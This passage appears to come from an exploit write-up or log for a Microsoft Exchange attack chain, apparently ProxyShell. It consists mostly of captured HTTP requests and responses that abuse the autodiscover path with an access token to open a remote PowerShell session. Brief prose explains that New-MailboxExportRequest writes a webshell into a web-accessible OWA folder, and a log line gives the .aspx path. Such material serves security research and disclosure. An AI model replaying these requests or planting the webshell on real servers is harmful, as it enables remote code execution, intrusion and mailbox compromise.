Content-Length: 1592

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:21622E17-57BA-495C-986B-86396EAAF295</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 77f3a4e1-bad4-4946-a11d-a3105b426324
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 602

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/DeleteResponse</a:Action><a:MessageID>uuid:7ED0491F-5478-4C6F-B2D5-5BCA64CCC90E</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:21622E17-57BA-495C-986B-86396EAAF295</a:RelatesTo></s:Header><s:Body></s:Body></s:Envelope>

Finally, the file write vulnerability is triggered via the New-MailboxExportRequest cmdlet, writing the user’s mailbox – and the webshell – to a web-accessible folder. The webshell is subsequently available for command execution.

[*] Writing to: \\\\win-bpid95acq7e.exchg.lan\C$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\9CTEoswT2.aspx
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 12138

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:B8554A3D-F3E5-40B8-BD52-180C49266838</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action><w:OptionSet env:mustUnderstand="true"><w:Option Name="protocolversion" MustComply="true">2.3</w:Option></w:OptionSet></env:Header><env:Body><rsp:Shell ShellId="64AB7291-77AD-4EBF-8674-B414FF6F4D4E" Name="Runspace"><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAEAAAAAAAAAAAMAAADhAgAAAAIAAQCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxWZXJzaW9uIE49InByb3RvY29sdmVyc2lvbiI+Mi4zPC9WZXJzaW9uPgogICAgPFZlcnNpb24gTj0iUFNWZXJzaW9uIj4yLjA8L1ZlcnNpb24+CiAgICA8VmVyc2lvbiBOPSJTZXJpYWxpemF0aW9uVmVyc2lvbiI+MS4xLjAuMTwvVmVyc2lvbj4KICA8L01TPgo8L09iaj4KAAAAAAAAAAIAAAAAAAAAAAMAAB0VAgAAAAQAAQCRcqtkrXe/ToZ0tBT/b01OAAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxJMzIgTj0iTWluUnVuc3BhY2VzIj4xPC9JMzI+CiAgICA8STMyIE49Ik1heFJ1bnNwYWNlcyI+MTwvSTMyPgogICAgPE9iaiBOPSJQU1RocmVhZE9wdGlvbnMiIFJlZklkPSIxIj4KICAgICAgPFROIFJlZklkPSIwIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJ1bnNwYWNlcy5QU1RocmVhZE9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+RGVmYXVsdDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8T2JqIE49IkFwYXJ0bWVudFN0YXRlIiBSZWZJZD0iMiI+CiAgICAgIDxUTiBSZWZJZD0iMSI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iQXBwbGljYXRpb25Bcmd1bWVudHMiIFJlZklkPSIzIj4KICAgICAgPFROIFJlZklkPSIyIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTUHJpbWl0aXZlRGljdGlvbmFyeTwvVD4KICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxEQ1Q+CiAgICAgICAgPEVuPgogICAgICAgICAgPFMgTj0iS2V5Ij5QU1ZlcnNpb25UYWJsZTwvUz4KICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI0Ij4KICAgICAgICAgICAgPFROUmVmIFJlZklkPSIyIiAvPgogICAgICAgICAgICA8RENUPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjUuMC4xMTA4Mi4xMDAwPC9WZXJzaW9uPgogICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgPFMgTj0iS2V5Ij5QU0NvbXBhdGlibGVWZXJzaW9uczwvUz4KICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI1Ij4KICAgICAgICAgICAgICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uVmVyc2lvbltdPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5BcnJheTwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgICAgICA8TFNUPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjEuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj4yLjA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgICAgICAgPFZlcnNpb24+My4wPC9WZXJzaW9uPgogICAgICAgICAgICAgICAgICAgIDxWZXJzaW9uPjQuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgICA8VmVyc2lvbj41LjAuMTEwODIuMTAwMDwvVmVyc2lvbj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+Q0xSVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj40LjAuMzAzMTkuNDIwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPkJ1aWxkVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4xMC4wLjExMDgyLjEwMDA8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPldTTWFuU3RhY2tWZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjMuMDwvVmVyc2lvbj4KICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgIDxTIE49IktleSI+UFNSZW1vdGluZ1Byb3RvY29sVmVyc2lvbjwvUz4KICAgICAgICAgICAgICAgIDxWZXJzaW9uIE49IlZhbHVlIj4yLjM8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICA8UyBOPSJLZXkiPlNlcmlhbGl6YXRpb25WZXJzaW9uPC9TPgogICAgICAgICAgICAgICAgPFZlcnNpb24gTj0iVmFsdWUiPjEuMS4wLjE8L1ZlcnNpb24+CiAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgPC9EQ1Q+CiAgICAgICAgICA8L09iaj4KICAgICAgICA8L0VuPgogICAgICA8L0RDVD4KICAgIDwvT2JqPgogICAgPE9iaiBOPSJIb3N0SW5mbyIgUmVmSWQ9IjYiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJfaG9zdERlZmF1bHREYXRhIiBSZWZJZD0iNyI+CiAgICAgICAgICA8TVM+CiAgICAgICAgICAgIDxPYmogTj0iZGF0YSIgUmVmSWQ9IjgiPgogICAgICAgICAgICAgIDxUTiBSZWZJZD0iNCI+CiAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlPC9UPgogICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4KICAgICAgICAgICAgICA8L1ROPgogICAgICAgICAgICAgIDxEQ1Q+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij45PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSI5Ij4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uU3RyaW5nPC9TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iViI+QzpcZGV2XGtpdGNoZW4tdmFncmFudDwvUz4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij44PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxMCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxMSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj4xOTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49ImhlaWdodCI+NTI8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjc8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjEyIj4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkhvc3QuU2l6ZTwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjEzIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0id2lkdGgiPjgwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjUyPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij42PC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIxNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5Ib3N0LlNpemU8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8T2JqIE49IlYiIFJlZklkPSIxNSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IndpZHRoIj44MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iaGVpZ2h0Ij4yNTwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+NTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTYiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5TaXplPC9TPgogICAgICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWIiBSZWZJZD0iMTciPgogICAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJ3aWR0aCI+MjUwPC9JMzI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgPEkzMiBOPSJoZWlnaHQiPjk5OTk8L0kzMj4KICAgICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICAgIDxFbj4KICAgICAgICAgICAgICAgICAgPEkzMiBOPSJLZXkiPjQ8L0kzMj4KICAgICAgICAgICAgICAgICAgPE9iaiBOPSJWYWx1ZSIgUmVmSWQ9IjE4Ij4KICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJUIj5TeXN0ZW0uSW50MzI8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjI1PC9JMzI+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MzwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMTkiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIwIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk3NDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MjwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjEiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uSG9zdC5Db29yZGluYXRlczwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxPYmogTj0iViIgUmVmSWQ9IjIyIj4KICAgICAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieCI+MDwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0ieSI+OTk5ODwvSTMyPgogICAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8L0VuPgogICAgICAgICAgICAgICAgPEVuPgogICAgICAgICAgICAgICAgICA8STMyIE49IktleSI+MTwvSTMyPgogICAgICAgICAgICAgICAgICA8T2JqIE49IlZhbHVlIiBSZWZJZD0iMjMiPgogICAgICAgICAgICAgICAgICAgIDxNUz4KICAgICAgICAgICAgICAgICAgICAgIDxTIE49IlQiPlN5c3RlbS5Db25zb2xlQ29sb3I8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8STMyIE49IlYiPjA8L0kzMj4KICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDwvRW4+CiAgICAgICAgICAgICAgICA8RW4+CiAgICAgICAgICAgICAgICAgIDxJMzIgTj0iS2V5Ij4wPC9JMzI+CiAgICAgICAgICAgICAgICAgIDxPYmogTj0iVmFsdWUiIFJlZklkPSIyNCI+CiAgICAgICAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgICAgICAgPFMgTj0iVCI+U3lzdGVtLkNvbnNvbGVDb2xvcjwvUz4KICAgICAgICAgICAgICAgICAgICAgIDxJMzIgTj0iViI+NzwvSTMyPgogICAgICAgICAgICAgICAgICAgIDwvTVM+CiAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPC9Fbj4KICAgICAgICAgICAgICA8L0RDVD4KICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICA8L01TPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49Il9pc0hvc3ROdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj5mYWxzZTwvQj4KICAgICAgICA8QiBOPSJfdXNlUnVuc3BhY2VIb3N0Ij5mYWxzZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogIDwvTVM+CjwvT2JqPgo=</creationXml></rsp:Shell></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 88a6e436-0d32-452b-ac1d-bbd1d3940dea
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 1640

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/CreateResponse</a:Action><a:MessageID>uuid:45776F6D-DD5F-4D8D-B682-A0F3B36E3E8B</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:B8554A3D-F3E5-40B8-BD52-180C49266838</a:RelatesTo></s:Header><s:Body><x:ResourceCreated><a:Address>http://127.0.0.1/PowerShell/</a:Address><a:ReferenceParameters><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></a:ReferenceParameters></x:ResourceCreated><rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"><rsp:ShellId>A45206E8-5119-4982-BEF9-9F2F7C0121B0</rsp:ShellId><rsp:ResourceUri>http://schemas.microsoft.com/powershell/Microsoft.Exchange</rsp:ResourceUri><rsp:Owner>smcintyre@exchg.lan</rsp:Owner><rsp:ClientIP>fe80::d932:1cb5:5d16:a750%3</rsp:ClientIP><rsp:IdleTimeOut>PT900.000S</rsp:IdleTimeOut><rsp:InputStreams>stdin pr</rsp:InputStreams><rsp:OutputStreams>stdout</rsp:OutputStreams><rsp:ShellRunTime>P0DT0H0M0S</rsp:ShellRunTime><rsp:ShellInactivity>P0DT0H0M0S</rsp:ShellInactivity></rsp:Shell></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1765

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:B800BAFE-974D-45D1-9222-75B36A142CF3</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream>stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 867d4c34-bf03-4607-a918-af2d7e89a8f5
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
